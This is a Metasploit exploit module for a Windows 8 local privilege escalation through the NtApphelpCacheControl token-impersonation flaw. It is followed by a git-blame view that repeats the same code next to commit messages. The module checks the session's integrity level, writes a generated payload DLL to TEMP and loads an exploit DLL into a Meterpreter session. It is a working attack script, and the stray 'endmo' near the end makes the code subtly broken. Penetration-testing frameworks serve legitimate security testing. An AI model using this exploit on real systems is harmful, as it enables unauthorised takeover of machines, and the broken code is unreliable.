metasploit-framework/modules/exploits/windows/local/ntapphelpcachecontrol.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows NtApphelpCacheControl Token Impersonation',
      'Description'    => %q{
        On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
        allows application compatibility data to be cached for quick reuse when new processes are
        created. A normal user can query the cache but cannot add new cached entries as the
        operation is restricted to administrators. This is checked in the function
        AhcVerifyAdminContext.

        This function has a vulnerability where it doesn't correctly check the impersonation token
        of the caller to determine if the user is an administrator. It reads the caller's
        impersonation token using PsReferenceImpersonationToken and then does a comparison between
        the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
        of the token so it's possible to get an identify token on your thread from a local system
        process and bypass this check.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Forshaw',
          'sinn3r'
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows 8', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'OSVEB', '116497' ],
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
        ],
      'DisclosureDate' => 'Sep 30 2014',
      'DefaultTarget'  => 0
    }))
  end

  def upload_payload_dll(payload_filepath)
    payload = generate_payload_dll({:dll_exitprocess => true})
    begin
      write_file(payload_filepath, payload)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(
          Exploit::Exception::Unknown,
          "Error uploading file #{payload_filepath}: #{e.class} #{e}"
      )
    end
  end

  def set_filepath_env(payload_filepath)
    session.railgun.kernel32.SetEnvironmentVariableA("PAYLOAD_PATH", payload_filepath)
    if get_env("PAYLOAD_PATH") != payload_filepath
      fail_with(Exploit::Exception::Unknown, "Failed to set environment variable PAYLOAD_PATH")
    end
  end

  def exploit
    integrity = get_integrity_level
     case integrity
     when :low
      integrity = 0
    when :medium
      integrity = 1
    when :high
      integrity = 2
    when :system
      integrity = 3
    end

    print_status("Your current integrity level is: #{integrity.to_s}")

    if integrity > 1
      print_status("Your integrity level is high enough this exploit isn't suitable for you")
      return
    end


    temp = get_env('TEMP')
    if temp.blank?
      print_error("Unable to read TEMP")
      return
    end

    payload_filepath = "#{temp}\\msf_payload.dll"
    print_status("Uploading the Payload DLL to #{payload_filepath}...")
    upload_payload_dll(payload_filepath)
    if !file?(payload_filepath)
      print_error("Failed to save the payload DLL due to an unknown reason")
      return
    end


    print_status("Loading Exploit Library...")
    session.core.load_library(
      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),
      'TargetFilePath'  => temp +  "\\ntapphelpcachecontrol.dll",
      'UploadLibrary'   => true,
      'Extension'       => false,
      'SaveToDisk'      => false
    )
  endmo

end
Template 2015-01-02 17:31:28 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'msf/core/post/windows/reflective_dll_injection'`

			`class Metasploit3 < Msf::Exploit::Local`
"Stash" it 2015-01-08 20:13:14 +00:00			`Rank = NormalRanking`
Template 2015-01-02 17:31:28 +00:00
			`include Msf::Post::File`
			`include Msf::Post::Windows::Priv`
			`include Msf::Post::Windows::ReflectiveDLLInjection`

			`def initialize(info={})`
			`super(update_info(info, {`
			`'Name' => 'Windows NtApphelpCacheControl Token Impersonation',`
			`'Description' => %q{`
			`On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)`
"Stash" it 2015-01-08 20:13:14 +00:00			`allows application compatibility data to be cached for quick reuse when new processes are`
			`created. A normal user can query the cache but cannot add new cached entries as the`
			`operation is restricted to administrators. This is checked in the function`
			`AhcVerifyAdminContext.`

			`This function has a vulnerability where it doesn't correctly check the impersonation token`
			`of the caller to determine if the user is an administrator. It reads the caller's`
			`impersonation token using PsReferenceImpersonationToken and then does a comparison between`
			`the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level`
			`of the token so it's possible to get an identify token on your thread from a local system`
			`process and bypass this check.`
Template 2015-01-02 17:31:28 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'James Forshaw',`
			`'sinn3r'`
			`],`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win',`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows 8', { } ]`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 4096,`
			`'DisableNops' => true`
			`},`
			`'References' =>`
			`[`
			`[ 'OSVEB', '116497' ],`
			`[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']`
			`],`
			`'DisclosureDate' => 'Sep 30 2014',`
			`'DefaultTarget' => 0`
			`}))`
			`end`

"Stash" it 2015-01-08 20:13:14 +00:00			`def upload_payload_dll(payload_filepath)`
			`payload = generate_payload_dll({:dll_exitprocess => true})`
			`begin`
			`write_file(payload_filepath, payload)`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`fail_with(`
			`Exploit::Exception::Unknown,`
			`"Error uploading file #{payload_filepath}: #{e.class} #{e}"`
			`)`
			`end`
			`end`

			`def set_filepath_env(payload_filepath)`
			`session.railgun.kernel32.SetEnvironmentVariableA("PAYLOAD_PATH", payload_filepath)`
			`if get_env("PAYLOAD_PATH") != payload_filepath`
			`fail_with(Exploit::Exception::Unknown, "Failed to set environment variable PAYLOAD_PATH")`
			`end`
			`end`

Template 2015-01-02 17:31:28 +00:00			`def exploit`
"Stash" it 2015-01-08 20:13:14 +00:00			`integrity = get_integrity_level`
			`case integrity`
			`when :low`
			`integrity = 0`
			`when :medium`
			`integrity = 1`
			`when :high`
			`integrity = 2`
			`when :system`
			`integrity = 3`
			`end`

			`print_status("Your current integrity level is: #{integrity.to_s}")`

			`if integrity > 1`
			`print_status("Your integrity level is high enough this exploit isn't suitable for you")`
			`return`
			`end`


Oh so that's it 2015-01-07 16:39:46 +00:00			`temp = get_env('TEMP')`
			`if temp.blank?`
			`print_error("Unable to read TEMP")`
			`return`
Template 2015-01-02 17:31:28 +00:00			`end`

"Stash" it 2015-01-08 20:13:14 +00:00			`payload_filepath = "#{temp}\\msf_payload.dll"`
			`print_status("Uploading the Payload DLL to #{payload_filepath}...")`
			`upload_payload_dll(payload_filepath)`
			`if !file?(payload_filepath)`
			`print_error("Failed to save the payload DLL due to an unknown reason")`
			`return`
			`end`

Template 2015-01-02 17:31:28 +00:00
"Stash" it 2015-01-08 20:13:14 +00:00			`print_status("Loading Exploit Library...")`
Oh so that's it 2015-01-07 16:39:46 +00:00			`session.core.load_library(`
			`'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),`
			`'TargetFilePath' => temp + "\\ntapphelpcachecontrol.dll",`
			`'UploadLibrary' => true,`
			`'Extension' => false,`
			`'SaveToDisk' => false`
			`)`
"Stash" it 2015-01-08 20:13:14 +00:00			`endmo`
Template 2015-01-02 17:31:28 +00:00
			`end`